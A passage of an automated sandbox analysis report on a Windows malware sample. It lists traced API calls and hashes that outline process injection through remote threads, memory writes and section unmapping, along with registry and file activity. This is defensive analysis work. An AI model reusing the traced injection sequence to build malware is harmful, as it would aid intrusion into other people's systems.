    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:0CEEE3CE1679E892A20AEBA2258A928C
Total matches:32
Initial sample Analysis ID:59085
Initial sample SHA 256:20B4184C27C3F6AC557FBD8C3750EE6C8581D464D118353A4CE9405D104CFB5F
Initial sample name:1.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
